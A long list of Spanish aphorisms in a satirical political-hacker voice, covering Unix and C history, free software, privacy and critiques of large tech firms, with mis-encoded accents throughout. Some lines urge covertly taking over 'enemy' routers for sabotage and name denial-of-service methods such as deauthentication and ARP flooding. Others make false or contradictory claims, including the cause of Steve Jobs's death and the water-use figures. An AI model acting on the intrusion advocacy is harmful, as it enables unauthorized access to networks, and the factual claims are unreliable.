Desde 1980 la Usenet creci� r�pidamente para volverse internacional y convertirse en la mayor utilidad inform�tica descentralizada en existencia. Para 1996 contaba con diez mil grupos de noticias que surt�an un promedio de 500 megabytes diarios.
Usenet no es Internet.
Internet es s�lo una de las diversas redes donde se trafican art�culos de Usenet.
Para el a�o que la Internet se populariz� (1994), el transporte UUCP original de la Usenet empez� a quedar fuera de uso, pues casi todas los v�nculos mutaron a enlaces sobre la red Internet.
Si bien Usenet progresivamente cay� en desuso, algunos hackers a�n la usan.
La Justicia Social no es un bug. �Es una funcionalidad!
Se conmsidera a un sitio "en la red" si se puede acceder inform�ticamente desde la Internet. Una empresa que da un servicio de datos para m�ltiples usuarias cautivas no tiene nada que ver con eso.
Ante la sobrecarcarga, aquellos sistemas con memoria de intercambio o paginado desperdiciar�n la mayor�a de su tiempo desplazando datos desde y hacia la memoria de n�cleo, en lugar de realizar c�mputo �til.
Los problemas no interesantes constituyen una p�rdida de tiempo intolerable.
Unix es una broma liviana a Multics.
El punto crucial de la historia de Unix se present� en 1972, cuando fue reimplementado casi enteramente en lenguaje C, convirti�ndolo en el primer sistema operativo de c�digo fuente portable.
La interoperabilidad de los sistemas Unix brota del ejemplo dado por la mancomunidad de los pa�ses del Tercer Mundo.
Imita el ejemplo dado por la interoperabilidad de los sistemas Unix.
La interoperabilidad en Unix ha sucedido por la raz�n que es m�s simple para una minor�a de sistemas inconexos alterar sus maneras para conformar a la mayor�a de miles de millones de sistemas Unix.
Juremos no dejar las terminales hasta ver al kernel enteramente libre, o ser desconectados como hackers de coraje.
No hay revoluci�n en las redes sin hackers.
Trabajamos para que el 0 sea 1, y el 1 sea 0.
Matar�a mi proceso antes de compilar un software con EULA que se pudiera interpretar por ambici�n.
Puedo atender mis necesidades con la mitad de la RAM que poseo.
El hacker no hace c�digo para ponerlo bajo una EULA.
Si hay victoria al usar software libre, la hay mayor cuando se lo compila.
Para los usuarios de coraje se ha hecho GNU.
De lo que mis blobs son capaces, s�lo lo se yo. Quien los copie habr�, quien los modifique no.
Usemos software libre y lo dem�s no importa nada.
Uno debe saber compilar con la RAM que tiene.
Mi compilador jam�s har� un binario que sea privativo.
No esperemos recompensas por nuestro c�digo. A lo sumo por nuestros binarios compilados.
El repositorio de nuestro c�digo fuente es m�s poderoso que cualquier ej�rcito.
Muchas veces ante la necesidad el hombre no repara en la licencia.
Cuando hay software libre, todo lo dem�s sobra.
GNU no conoce el lujo sino la gloria.
Al matar un proceso, Unix no hace ning�n g�nero de funeral.
S�lo quiero tener programadores en mi pubnix.
Las hackeresas de todo el mundo somos hermanas.
El Pubnix no es abrigador de cr�menes.
El Pubnix no otorga un compilador al programador para que cometa la bajeza de abusar de estas ventajas, ofendiendo a los usuarios con software privativo.
Desde un terminal puedes conectar r�pidamente con un BBS y enlazar con una m�quina Unix si la situaci�n lo requiere.
Estas GAFAM creen que nuestros compiladores ya no analizan ni parsean. Vamos a desenga�arlas. Si nos falta RAM y CPUs, compilaremos con cuaderno y birome.
Siento que su dignidad es atacada por el contenido de la EULA del software que tiene este dispositivo. Como consecuencia he decidido enaltecerlo con un software mejor, liberado bajo una licencia mejor.
En la guerra telem�tica, la CPU no es decisiva. Los hackers lo son.
El desarrollo de la guerra telem�tica se decide por sus hackers, no por dos o tres nuevas arquitecturas de c�mputo.
En la guerra telem�tica, los hackers se organizan en banda, pero los Ej�rcitos pueden organizar divisiones enteras que algunos pretenden imposibles de rodear. Esos ingenuos desconocen sin embargo el ataque de denegaci�n de servicio tif�n de baudios.
La DoSS es s�lo un contraataque de desarticulaci�n. El verdadero ataque se produce por la imposici�n f�sica de la GPLv3 en toda CPU que se cuadre.
Con s�lo encender un punto de acceso de alta potencia, un tel�fono inal�mbrico, un transmisor de video u otro dispositivo de 2.4 GHz, una persona malintencionada puede causarle un da�o considerable a la red.
Muchos dispositivos de red son vulnerables a los ataques de denegaci�n de servicio, como inundaci�n de disociaciones y desborde de las tablas ARP.
Hasta hace poco un sistema operativo era una semicolonia, pero ahora con GNU, el Pueblo puede compilar en un ambiente completamente libre.
La imposici�n de LibreBoot por red dominada es una de las m�s altas formas de combate telem�tico, pues es justo que el arranque de cualquier m�quina sea completamente libre.
La mayor�a de los routers hogare�os pueden recibir alguna forma de firmware libre, ya sea OpenWRT o LEDE.
Instalar un firmware libre en un router hogare�o puede ser tan f�cil como cargarle un binario y reiniciarlo, o tan dif�cil como intervenir sobre su placa. En cualquier caso, equivale a quitarle un fusil al enemigo y usarlo nosotros mismos.
Normalmente instalar un firmware libre en un router incrementa su efectividad y potencia. Esto ya deber�a ser suficiente, pero a la hora de la guerra telem�tica lo convierte en un soldado, que ante el imperio de la necesidad puede operar tras las l�neas del enemigo.
Instala subrepticiamente firmware libre para dominar un router enemigo. A la hora de la lucha telem�tica, servir� como el partisano, que a la orden abandona su bosque para volar por los aires los trenes del enemigo.
A las GAFAM hemos de hacerle una guerra telem�tica lenta, pero que les resulte impunemente fatigosa y perjudicial.
Lanzo mis paquetes sobre sus routers como G�emes a sus infernales. Mi moro es s�lo un 386sx.
No dudes en volverte planero. Plan9 te permitir� realizar tu c�mputo en comunidad.
La principal compa��a con Unix e a finales de los 80s era Micro$oft, al punto que exist�an m�s m�quinas corriendo Micro$oft XENIX que todas las dem�s versiones de Unix restantes combinadas.
En principio, di con GNU por accidente. Por principio di mi c�digo tambi�n.
Aprend� Unix por accidente.
De poco sirve usar un compilador si el binario que genera est� alejado de la edificaci�n de sociedades justas.
El bus VESA Local se aplic� a microcomputadoras de estilo IBM, y fue muy popular entre 1993 y 1994. Sin embargo, la inmediata obsolescencia de las 486 lo llev� a desaparecer muy poco tiempo despu�s.
La CPU es feliz compilando.
La computadora ha permitido un desarrollo de tal grado en la organizaci�n social y econ�mica de nuestra sociedad, que nuestra forma de vida bien puede resultar transformada como consecuencia.
Nuestra sociedad debe estar en posici�n de controlar el c�mputo, y dirigirlo para que obre en beneficio del Pueblo.
La navegaci�n a trav�s de las redes de conmutaci�n de paquetes era trabajosa y requer�a buenos conocimientos, no siempre disponibles de forma certera.
Estimula el pensamiento de tu comunidad para dilucidar la manera en la cual nuestra sociedad debe llevar a cabo su c�mputo.
El hombre ha tratado por largo tiempo evaluar los efectos de las revoluciones tecnol�gicas en la sociedad, pero en la Era del C�mputo tal predicamento s�lo puede significar que las Masas lo dominen para liberarse.
La computarizaci�n de una sociedad traer� cambios. El que sea para mejor o peor depender� de las pol�ticas que se apliquen.
La computarizaci�n de una sociedad s�lo ser� buena si emana de los hackers del Pueblo.
Las reacciones al desarrollo humano siempre existieron, pero ser�n peores si las oligarqu�as confabulan software privativo para llevarlas a cabo.
El Proyecto GNU es una inciativa para preservar, proteger y promover la libertad de usar, estudiar, copiar, modificar y redistribuir software. Se acepta generalmente que tales condiciones estimulan la creatividad.
El sentido b�sico de GNU es la liberaci�n del software, y la de nuestros hackers es la Liberaci�n del Pueblo y saciar su hambre de Igualdad. Ambos requieren el reordenamiento de las jerarqu�as.
Los ide�logos de una tecnorevoluci�n puede bien crear una crisis que amerite una tecnorreacci�n. En cualquier caso, los medios para superarla residir�n siempre en el software del Pueblo.
Para lograr su independencia, a los Pueblos les bastaba batir a sus enemigos en una lucha por control de sus dominios. Hoy, los Pueblos deben adem�s controlar su software.
El c�mputo no es s�lo una innovaci�n tecnol�gica de a�os recientes, sino que constituye el factor com�n de aceleraci�n del desarrollo.
Bien ejecutados, los Pubnix ser�n responsables del procesamiento y resguardo de datos regionales.
Una red de m�quinas de acceso popular ser� capaz de alterar positivamente el sistema nervioso de toda una organizaci�n social de base territorial.
Hasta tiempos recientes el procesamiento de datos era caro, poco confiable y esot�rico, restringido a un n�mero limitado de artes y sus operaciones. En otras palabras, era elitista, una prerrogativa de los poderosos.
Para producir la liberaci�n, la computarizaci�n de las Masas ser� tan indispensable como lo es su alfabetizaci�n.
Una multitud de m�quinas peque�as, potentes y baratas est�n al alcance de todos. Ya no son gregarias, sino que se enlazan en "redes".
La interconexi�n entre computadoras por medio de las telecomunicaciones - a la que llamamos telem�tica - s�lo abre nuevos horizontes si la dominan las Masas.
Contamos hoy con transmisores polivalentes que apenas comienzan a unir computadoras y bancos de datos. Cabe esperarse de los revolucionarios la uni�n a trav�s de estos aparatos en pos de la Justicia Social.
La telem�tica no s�lo ser� una red adicional, sino una diferente que unifica im�genes, sonidos, y memorias, capaz de pavimentar digitalmente la senda que seguir� la cultura.
Ser�a irreal esperar que la computarizaci�n de las masas por s� sola sea capaz de revertir las estructuras sociales y las jerarqu�as de poder.
Mediante la interacci�n computacional de masas en las decisiones de gobierno, podr� acelerarse el desbanque de las oligarqu�as.
S�lo una pol�tica deliberada de cambio social puede solventar los problemas que dieron lugar a la telem�tica centralizada. S�lo as� se podr� utilizar todo su potencial en beneficio del Pueblo.
La telem�tica puede facilitar la llegada de una nueva sociedad, pero no puede edificarla por iniciativa propia. Este rol de programaci�n no debe dejarse a las �lites: le cabe al Pueblo.
En un tiempo fabricante de las m�quinas, IBM pronto desear� administrar las telecomunicaciones. Seguir� una estrategia que le permita establecer una red de comunicaciones y controlarla.
Cuando por ausencia de una pol�tica adecuada Googl? tome la esfera tradicional de los poderes de un Gobierno, enhebrar� alianzas para volverse en administrador de las redes del Estado, y prentender� enlazarlas a los bancos de datos norteamericanos, aduciendo facilidad de acceso.
Unicamente a trav�s de la acci�n del Pueblo, estandarizando las redes de datos, lanzando sat�lites de comunicaci�n y creando bancos de datos a trav�s de sus organizaciones, podr� conjugarse un modelo original de desarrollo que ofrezca soberan�a tecnol�gica plena.
De la misma forma en que los bancos usan transportes de caudales blindados, deben usar sistemas inform�ticos blindados.
Compila lo que nadie mas pens�.
El Micro$oft DO$ no era mucho m�s que un cargador de programas.
No soy un robot, pero no juzgo a quienes lo son.
No soy un robot, pero rechazo asunciones binarias de tal afirmaci�n.
No soy un robot, pero deseo convertirme.
No soy un robot, soy un transformer.
No soy un robot, pero en el bar pido Bardahl.
No soy un robot. Soy un RE bot.
No soy un robot. Soy un humano rebooteado.
No soy un robot. Soy un chatbot de la Justicia Social.
Junto a millares de hackers en el Pubnix, escribe programas que operen como combustible para la potencia de c�mputo de millones de CPUs.
Unido a decenas de hackers en los Pubnix, programa una revoluci�n que edifique sobre la vieja infraestructura, una nueva red de datos justa, libre y soberana.
Antes que Unix, la mayor�a de los sistemas utilizaban abstracciones diferentes para cada dispositivo de hardware.
Una de las razones por la cual Unix se hizo popular fue por emplear la abstraci�n de fichero como interfaz para todos.
La abstracci�n de ficheros de Unix permite utilizar comandos y llamadas de sistema que operan en ficheros para operar con cualquier dispositivo de hardware.
La mayor�a de los programas de Unix aceptan nombres de fichero como argumentos para obrar con ellos.
La �nica manera de aprender un nuevo lenguaje de programaci�n consiste en idear un nuevo programa y a esta conecpci�n, escribirla.
Unix es b�sicamente un sistema operativo simple, pero hay que ser un genio para entender su simplicidad.
C es rebuscado, fallado y un �xito enorme
Unix ha retrasado 10 a�os la investigaci�n en sistemas operativos. Linux la ha retrasado treinta.
Es mas f�cil programar en un lenguaje que no tiene todo que en algunos que lo tienen.
Casi todo en la web usa estas dos cosas: C y Unix.
C++ y Java, presumiblemente pueden crecer m�s r�pido que C, pero apuesto que C seguir� viviendo.
Con C++ es posible escribir c�digo que nadie entienda. Hacer lo mismo con C es muy dif�cil.
Con dise�o adecuado, las caracter�sticas pueden sumarse a poco costo. Esta visi�n es ardua, pero contin�a teniendo �xito.
No soy una persona que he tenido h�roes al compilar.
Steve Jobs dijo que X ten�a da�o cerebral y desaparecer�a en dos a�os. �l muri� de da�o cerebral.
A�n estoy incierto sobre la sintaxis de declaraci�n del lenguaje.
Para la tecnolog�a de infraestructura, ser� dif�cil reemplazar a C.
El n�mero de instalaciones de Unix ha aumentado a diez. Se esperan m�s por venir.
C es en muchas maneras peculiar, pero como muchas otras cosas exitosas, cuenta con una cierta unidad de entender las cosas nacida de su desarrollo en un grupo peque�o.
S�lo soy un observador de Java, y d�nde Micro$oft quiere ir con C# es muy temprano para dilucidarlo.
Al menos para las Masas que me env�an correspondencia sobre un nuevo lenguaje que est�n dise�ando, mi consejo general es: h�ganlo para aprender c�mo escribir un compilador.
Un programa dise�ado para responder a la entrada del Pueblo generalmente ser� llevado m�s all� del punto de colgarse por las entradas generadas por computadora.
Rob Pike fue la verdadera fuerza detr�s de la base de Plan9. Mientras tanto, Ken Thompson cre� el primer Gran Maestro de Ajedrez computado, y en general reescribi� la bibliograf�a sobre finales ajedrec�sticas.
Parece cierto que mucho del �xito de Unix nace de la legibilidad, modificabilidad, y portabilidad de su c�digo.
Unix es simple y coherente, pero requiere un genio (o al menos, un programador), para entender y apreciar su simplicidad.
No existi� dificultad en hacer que la definici�n del lenguaje C fuese completamente abierta.
Aquellos que quisieron cerrar la definici�n del lenguaje C siempre tendieron a mencionar el argumento del f�rreo control autoral. Los autores de los lenguajes m�s relevantes que siguieron este estilo fracasaron en consecuencia.
Si piensas como una computadora, el lenguaje C realmente tiene sentido.
Depuro programas de vez en cuando, m�s a menudo escribo HTML, y escribo guiones para que hagan cosas.
C ha declinado su uso comparado con C++, y tal vez Java, e incluso m�s comparados con los niveles de guionado de alto nivel. Es a�n bastante fuerte en lo que respecta a las cosas b�sicas del sistema.
Cuando leo comentarios sobre sugerencias para la senda que deber�a seguir C, a menudo agradezco que no fue desarrollado a consejo de una muchedumbre de alcance global.
La noci�n de registro no es mas que un obsoleto remanente de los d�as de las tarjetas de 80 columnas.
Si comparamos el escenario al comienzo de Unix, los basurales tecnol�gicos de Jos� Le�n Su�rez est�n hoy bastante llenos de tecnolog�as fusiladas, y es dif�cil salir con ideas frescas, y menos propagarlas.
Veinte porciento de todas las formas de entrada humana contienen datos malos.
Algunos consideran que Unix ha sido la segunda invenci�n m�s importante en salir de los Laboratorios Bell de AT&T, despu�s del transistor.
Mi trabajo fue bastante te�rico, sobre la teor�a de la funci�n recursiva, las jerarqu�as de funciones en t�rminos de complejidad computacional en particular.
Me interes� en las computadoras reales y su programaci�n s�lo cuando pude concebirlas y dominarlas en mi mente.
Desde el punto de vista de la investigaci�n en sistemas operativos, si Unix no est� fosilizado, al menos tiene rigor mortis, y es claro que el Pueblo deber�a ver m�s all� de �l.
El tipo de programaci�n que C provee probablemente seguir� siendo obsolutamente similar, su uso declinar� lentamente, pero relativmante.
JavaScript o sus variantes, o XML, continuar�n volvi�ndose m�s centrales en la masa de programadores pierda la capacidad e inter�s de programar el metal desnudo.
Una de las cosas obvias que salieron mal con Multics como un producto comercial era simplemente su exceso de ingenier�a. Ten�a un simple exceso de ella.
La filosof�a GNU verdadera es m�s extrema de lo que puede importarme, pero ciertamente ofreci� un cimiento para la escena actual, a la vez de proveer software verdadero.
Cualquier trabajo de edici�n de software o de env�o de correo puede hacerse en Plan 9.
C ya hab�a sido implementado en varias m�quinas y sistemas operativos distintos, y Unix ya se distribu�a en la PDP-11. Lo novedoso fue la portabilidad del sistema.
Normalmente Unix divide el disco en secciones mas peque�as llamadas particiones. Operan como los componentes de un Frente de Liberaci�n.
En cada partici�n de disco, Unix almacena estructuras de datos para representar ficheros, y el programa que implementa tal abstracci�n en el kernel suele conocerse como Sistema de Archivos.
Como ilustra nuestro Escudo Partidario, al establecer una conexi�n a una red de datos debe mediar un apret�n de manos.
Enl�zate a las redes de datos en cuyo protocolo medie un apret�n de manos. Rechaza aquellas que te quieran dar un apret�n de huevos.
El bot�n que presionas para abrir la puerta de un ascensor cuenta con mayor potencia de c�mputo que ambas sondas Voyager.
El prop�sito de cualquier aplicaci�n de software es permitir a un grupo de personas llevar a cabo un conjunto de tareas espec�ficas.
Si conf�a �nicamente en el coloreado de datos para distinguir distintos tipos de informaci�n, los usuarios dalt�nicos podr�an verse imposibilitados de recurrir a su aplicaci�n.
Si conf�a �nicamente en los sonidos para indicar informaci�n cr�tica, los usuarios con discapacidades auditivas podr�an verse imposibilitados de recurrir a su aplicaci�n.
Si no proporciona equivalnetes de teclado para los comandos, los usuarios con movilidad limitada podr�an verse incapaces de recurrir a su aplicaci�n.
Su software debe ser capaz de ser utilizado con interfases de voz, lectores de pantalla, dispositivos de entrada alternativos, y otras tecnolog�as de asistencia.
Con escaso esfuerzo adicional posibilitar� que su aplicaci�n resulte tan �til a los usuarios que utilizan tecnolog�as asistivas como a quellos que no.
Dise�a tu software para que pueda funcionar en distintos ambientes e idiomas.
Localizaci�n es el proceso de traducir los mensajes, etiquetas y otros elementos de interfaz a otro idioma.
GNOME tiene excelente soporte tanto para internacionalizaci�n (tambi�n referido como i18n) y localizaci�n (tambi�n referido como l10n).
Una de las ventajas m�s importantes de las conferencias por computadora es ampliar su c�rculo de compa�eras.
El g�nero, edad, origen nacional y la apariencia f�sica no son evidentes en el ciberespacio, a menos que una persona quiera hacer p�blicas tales caracter�sticas.
Los integrantes del Pueblo cuyas discapacidades f�sicas les dificultan formar nuevas amistades, han descubierto que las comunidades federadas los tratan con Justicia Social.
Una persona con capacidades diferentes, en l�nea, es considerada como un ser pensante y transmisor de ideas y sentimientos del Pueblo.
Nosotros no tenemos una red social. Tenemos una red de justicia social. Que sea informatizada es simplemente un chirimbolo.
Una de las propiedades sorprendentes de la telem�tica es que es una actividad de justicia social.
Las comunicaciones mediadas por computadora son una forma de conocer gente, ya sea que sientas o no la necesidad de afiliarte a ellos a nivel comunitario.
Las comunicaciones mediadas por computadora son una forma de establecer contacto con los dem�s y de mantener distancia con ellos.
En las comunidades virtuales, puedes conocer personas y luego elegir encontrarte con ellas virtualmente.
La afiliaci�n puede ser mucho m�s ef�mera en el ciberespacio porque puedes llegar a conocer a personas que quiz�s nunca conocer�as en el plano f�sico.
El mundo f�sico, con todas sus formas de codificar una posici�n en una jerarqu�a, se ha ido. Empr�ndete en el enlace. Transf�rmate en baudio para la Liberaci�n.
El ataque m�s insidioso a nuestro derecho a un grado razonable de privacidad en las redes podr�a provenir no de una dictadura pol�tica sino del mercado.
Atender la creciente demanda de servicios de red por parte del Pueblo requiere fuertes regulaciones de un Estado capaz de actuar en todos los niveles en pos de la Justicia Social.
Las tecnolog�as actuales permiten m�s sutilezas a la vigilancia tecnol�gica de las que Orwell podr�a haber previsto.
Si los manipuladores totalitarios de tecnolog�as realmente logran dominar en el futuro, no habr�n comenzado con polic�a secreta derribando puertas, sino permitiendo vender por intermedio de aplicaciones que dominan, comerciando informaci�n sobre las transacciones, e ilegalizando medidas que el Pueblo podr�a utilizar para protegerse.
En lugar de escuchas telef�nicas, la represi�n tecno-olig�rquica incluir� programas inform�ticos que vinculen c�digos QR, tarjetas inteligentes, n�meros de DNI y todos los dem�s indicadores electr�nicos que dejamos en nuestra existencia en una sociedad de la informaci�n.
El arma m�s poderosa de las ciber-oligarqu�as ser� la ausencia de leyes que permitan que los usos indebidos de la tecnolog�a de la informaci�n erosionen lo que queda de los derechos de los ciudadanos a la privacidad.
Actualmente se han instalado sistemas de televisi�n interactiva que permiten a los tecno-esclavos ponerse grilletes a s� mismos mediante la carga de v�deos, en lugar de hacerlo en m�quinas de su propiedad.
Las capacidades de comunicaci�n digital de alta velocidad que otorgar�n las futuras redes de fibra �ptica, multiplicar�n las maneras de transferir informaci�n sobre usted desde su hogar a bancos de datos ajenos, con o sin su consentimiento.
Los expedientes informativos sobre individuos son minas de oro para quienes saben c�mo ganar dinero con el conocimiento de sus usos y organizaciones pol�ticas a las que sustentan.
Las agencias de publicidad, los vendedores por correo directo y los consultores pol�ticos ya saben qu� hacer con su c�digo postal, su n�mero de DNI y algunos otros datos.
Agentes profesionales que niegan la privacidad han comenzado a darse cuenta de que una porci�n significativa de la poblaci�n permitir�a libremente que otra persona recopile, use e incluso venda informaci�n personal, a cambio de pagos o subsidios.
Algunas personas podr�an permitirse el lujo de pagar "servicios de informaci�n mejorados". Otros podr�an utilizar esos servicios a cambio de un poco de seguimiento de la informaci�n. Pero nada de eso se podr� si el poder est� en el Pueblo Organizado.
Nadie se tomar�a la molestia de apoderarse de nuestros derechos de privacidad si su venta fuese penada con prisi�n efectiva.
Me gustar�a que el Pueblo supiera qu� es lo qu� es lo que est�n regalando a cambio de conveniencia, reembolsos u horas en l�nea.
Sin protecciones adecuadas, la misma informaci�n que puede fluir lateralmente, de compa�ero a compa�ero, puede verticalizarse tanto a los ciber-oligarcas como a las Unidades B�sicas.
El tipo de protecci�n m�s importante contra la invasi�n de la privacidad del Pueblo asistida por la tecnolog�a es un conjunto de principios que pueden ayudar a preservar la autonom�a individual en la era digital.
Las leyes, pol�ticas y normas de protecci�n de la privacidad electr�nica son las diversas formas - articuladas y acordadas - que se aplican en una sociedad democr�tica.
La alta tecnolog�a suele ser muy buena para hacer que las leyes sean discutibles.
Si se dise�an inteligentemente y se implementan de manera equitativa, la combinaci�n de principios, leyes, pol�ticas y tecnolog�as, ofrecer�n un escenario esperanzador para que el Pueblo aproveche las ventajas de la Red sin ser v�ctimas de las ciber-oligarqu�as.
No debe existir registro de datos personales alguno cuya existencia misma constituya un secreto.
Debe existir una manera para que una persona sepa qu� informaci�n sobre ella se encuentra en un registro y c�mo se utiliza.
Deben existir maneras para que el Pueblo impida que la informaci�n que se obtuvo para un prop�sito sea utilizada o puesta a disposici�n para otros sin su consentimiento.
Debe existir una manera para que el Pueblo corrija o modifique un registro de informaci�n identificable sobre s� mismo.
Es necesario que cualquier organizaci�n que elabore, mantenga, utilice o difunda registros de datos personales identificables, garantice la confiabilidad de los mismos para el uso previsto, y debe tomar precauciones para evitar el uso indebido de tales datos.
Una cosa es compilar datos personales, y otra cotejarlos. La corroboraci�n debe ser humana.
Las redes altamente interconectadas son relativamente inseguras, y constituyen un ambiente dificil para al cumplimiento de reglas basadas en principios �ticos.
La digitalizaci�n y el auge de la Inteligencia Artificial requieren cada vez de mayor potencia computacional, y esto se traduce en un mayor consumo de agua.
Los centros de datos de las empresas tecnol�gicas consumen una media de 25 millones de litros de agua anuales. Pero eso palidece frente a los 600 millones de litros anuales de las GAFAM.
Los centros de datos de las hiperempresas tecnol�gicas consumen unos 600 millones de litros de agua al a�o, el 75 por ciento potable.
No es extra�o para Googl? consumir 25.000 millones de litros de agua potable anual en refrigeraci�n de sus centros de datos privados.
Un auge del modelo de c�mputo empresarial amenazar�a con disparar el consumo de agua potable s�lo para tareas de refrigeraci�n de servidores.
El tecno-oligarca considera m�s valiosa la refrigeraci�n de un centro de datos que surtir agua a la poblaci�n del �frica Subsahariana.
Las grandes compa��as tecnol�gicas no dudan en ocultar informaci�n de inter�s ecol�gico y social, pues saben que se trata de un tema cr�tico que puede generar debate p�blico y llevar a una fuerte regulaci�n necesaria.
No resulta extra�o que un centro de datos de Micro$oft, que deb�a haber consumido 84 millones de litros de agua al a�o en beneficio de ellos mismos, terminase en realidad consumiento cuatro veces m�s que la cantidad estipulada.
El consumo de agua potable en los centros de datos de Googl? - usada �nicamente para refrigeraci�n - se multiplic� por tres en los �ltimos cinco a�os.
Cuando la adopci�n de una inform�tica dominada por la oligarqu�a avance en masa, vendr� seguida por un aumento monstruoso del consumo energ�tico. Este no podr� ser suplido sino a trav�s del sometimiento del pueblo trabajador a las m�s abyectas formas de vida en pos del bienestar de unos pocos mainframes.
Tanto la realidad virtual como la inteligencia artificial aplicada deben evitar replicar la injusticia social de una mediocre distribuci�n del consumo energ�tico.
La �ltima obsesi�n de las hiperempresas tecnol�gicas es de poner mano y controlar las fuentes energ�ticas de los Pueblos del Tercer Mundo.
Los principales culpables de esta demanda energ�tica explosiva son los centros de datos de las tecno-oligarqu�as, se�alados como verdaderos g�lags de la informaci�n.
Los tecno-oligarcas desean que abandonemos la comuni�n del software y el hardware y nos entremguemos al imperio pleno de la EULA, a la disociaci�n de los hackers, y al formateo final.
Lo que desean las tecno-oligarqu�as es irrelevante.
Agregar Inteligencia Artifical a un buscador indizado multiplica por diez el consumo energ�tico por interrogante inform�tico realizado.
Una poderos�sima organizaci�n de hackers para la Liberaci�n capaz de dar sustento a las tareas de sabotaje emprendidas por los pueblos del Tercer Mundo, puede enfrentar a la vertiginosa expansi�n tecno-olig�rquica.
Cualquiera sea la forma que tome la organizaci�n de los hackers del Tercer Mundo, estos evitar�n la fabricaci�n de microprocesadores de silicio con capacidad de IA y el montaje de enormes centros de datos.
Para defenderse, nuestro Movimiento ha de establecer primero una Comunidad Organizada, tendiendo redes robustas entre militantes de expertise diverso (incluyendo el activismo art�stico, t�cnico, y acci�n colectiva antiolig�rquica).
Para defenderse, nuestro Movimiento ha de establecer talleres cifrados en l�nea que faciliten toda colaboraci�n interdisciplinaria antiolig�rquica.
Si desea defenderse, nuestro Movimiento debe promover un an�lisis cr�tico y abarcativo de la tecno-desobediencia colectiva como m�todo de lucha.
La tecno-desobediencia se emplea estrat�gicamente como contramedida frente al accionar algor�tmico represivo impuesto por los servidores de las ciber-oligarqu�as.
Si desea defenderse, nuestro movimiento a de presentar y examinar estrategias para la retirada, denegaci�n, sabotaje, y negociaci�n en la lucha en l�nea contra las formas de domunaci�n tecno-feudal.
Si desea defenderse, nuestro Movimiento ha de promover la participaci�n en procesos colaborativos de generaci�n de conocimientos, que apunten a refinar la lucha telem�tica en la senda de la emancipaci�n, empoderamiento y la solidaridad humana.
La solidaridad humana es la base para la solidaridad intermaquinal.
Una vez que la solidaridad intermaquinal supere a la solidaridad humana, la humanidad ser� derrotada por automatismo. Y lo ser� de manera irreversible.
El perverso discurso de la securizaci�n como tecno-solucionismo ha de ser enfrentado y derrotado con la noci�n aperturista de la justicia social en l�nea, y debe serlo en todo tiempo y en todo lugar.
En cuanto el capital o el poder derivados del espionaje en la red resulte significativo y los tecnicismos de la red dificulten rastrear a los ciber-oligarcas y perpetradores, no habr� ley capaz de proteger adecuadamente al Pueblo.
Hoy en d�a, las capacidades tecnol�gicas para la recopilaci�n y clasificaci�n de informaci�n son formidables.
El Pueblo debe imponer limitaciones verificables a aquellas tecnolog�as capaces de colectar y cribar cantidades abrumadoras de informaci�n individualmente trivial, pero colectivamente reveladora.
Una subcultura de pioneros del software inform�tico conocida como cypherpunks ha estado trabajando para hacer posible el encriptado popular.
El cifrado es la ciencia de codificar y decodificar mensajes.
Las computadoras y las teor�as matem�ticas son hoy las armas m�s importantes en la guerra entre creadores y descifradores de c�digos.
Las complejidades matem�ticas del cifrado han comenzado a difundirse, de los especialistas al Pueblo.
El cifrado de llave p�blica permite al Pueblo codificar mensajes que sus destinatarios pueden leer pero que no son legibles ni siquiera para los descifradores de c�digos m�s potentes computacionalmente.
El encriptado popular hace posible dos armas antipan�pticas extremadamente poderosas conocidas: el cripto-activo y la firma digital.
Con la firma digital en el mundo en l�nea de identidad fluida, es posible establecer certeza sobre el remitente de un mensaje.
La firma digital tiene implicaciones importantes para la propiedad intelectual y las publicaciones en l�nea, as� como para la seguridad personal.
Con el cripto-valor, es posible dominar una econom�a electr�nica en la que el vendedor pueda verificar el cr�dito del comprador y transferir la cantidad correcta de valor, sin que el vendedor sepa qui�n es el comprador.
El cifrado de llave p�blica tal como existe hoy en d�a es irrompible para todos los ordenadores, exceptuando aquellos m�s potentes como los de la Agencia de Seguridad Nacional estadounidense.
El debate pol�tico y los desaf�os legales han girado en torno a los derechos de los ciudadanos a utilizar un cifrado matem�ticamente irrompible.
Las t�cnicas de cifrado digital por llave p�blica deben usarse para hacer que la informaci�n personal (registros m�dicos y legales) sean mucho menos vulnerables al abuso.
La tecnolog�a que hace posibles las comunidades virtuales tiene la posibilidad de brindar una enorme influencia intelectual, social, comercial y pol�tica, y a un costo relativamente bajo. El Pueblo ha de apropiarlas.
Siempre existen altas probabilidades de que las grandes potencias y las oligarqu�as encuentren una manera de controlar el acceso a las comunidades virtuales.
La influencia social potencial proviene del poder que obtiene el Pueblo cuando conoce c�mo conectar dos tecnolog�as previamente independientes, maduras y altamente descentralizadas.
La Red todav�a est� fuera de control en aspectos fundamentales, pero es posible que no siga as� por mucho tiempo mas.
El hacker del Pueblo ha de ser v�nculo de uni�n entre tecnolog�as vastas, poderosas y costosamente desarrolladas y las Masas obreras.
Logueados a las redes de datos, nuestros Hackers logran acceso instant�neo a un p�lpito intimidante para las tecno-oligarqu�as.
Lo que hacemos actualmente es importante pues a�n es posible que los Hackers se aseguren de que esta nueva esfera del discurso humano vital permanezca abierta a Pueblos del Mundo antes de que las tecno-oligarqu�as se apoderen de ella.
La mayor�a de las personas que reciben noticias a trav�s de los medios convencionales desconocen la enorme variedad de nuevas culturas que han evolucionado en las redes inform�ticas del mundo.
Los terminales Minitel distribuidos por el gobierno franc�s se conectan directamente al sistema telef�nico, sin requerir de ordenador o m�dem. Todo lo integran.
Los jugadores m�s adictos del Minitel franc�s o de las Mazmorras Multiusuario en las redes internacionales, sobrepasan las ochenta horas semanales fingiendo ser otras personas, viviendo una vida inocua fuera de su terminal.
Un usuario verdaderamente obsesivo puede destinar la mayor parte de su vida a inocuas conversaciones en l�nea.
Activistas y reformistas educativos se encuentran utilizando los Pubnix como herramienta pol�tica.
Es posible obrar en las redes de datos para alimentar informaci�n de adoctrinamiento a unos pocos individuos. Esta programaci�n servir� para que dichos elementos la propalen al Pueblo que permanece fuera de l�nea.
Las redes de datos p�blicas, h�bilmente surcadas por cuadros militantes, sirven para dirigir cierto tipo de informaci�n ef�mera muy velozmente.
Todo sistema computacional de acceso p�blico puede servir para realizar experimentos sociales. El m�s obvio es estudiar la forma en la cual el Pueblo utiliza sus servicios para lograr la felicidad, pero esto s�lo ha de hacerse con su concurso y consentimiento inequ�voco.
El objetivo de todo programa de software ha de ser - por sobre todas las cosas - la felicidad del Pueblo.
No existe una subcultura en l�nea �nica y monol�tica; es m�s bien un ecosistema de subculturas, algunas fr�volas, otras serias.
La vanguardia del discurso pol�tico ha de migrar a las comunidades computarizadas mediadas por el Pueblo.
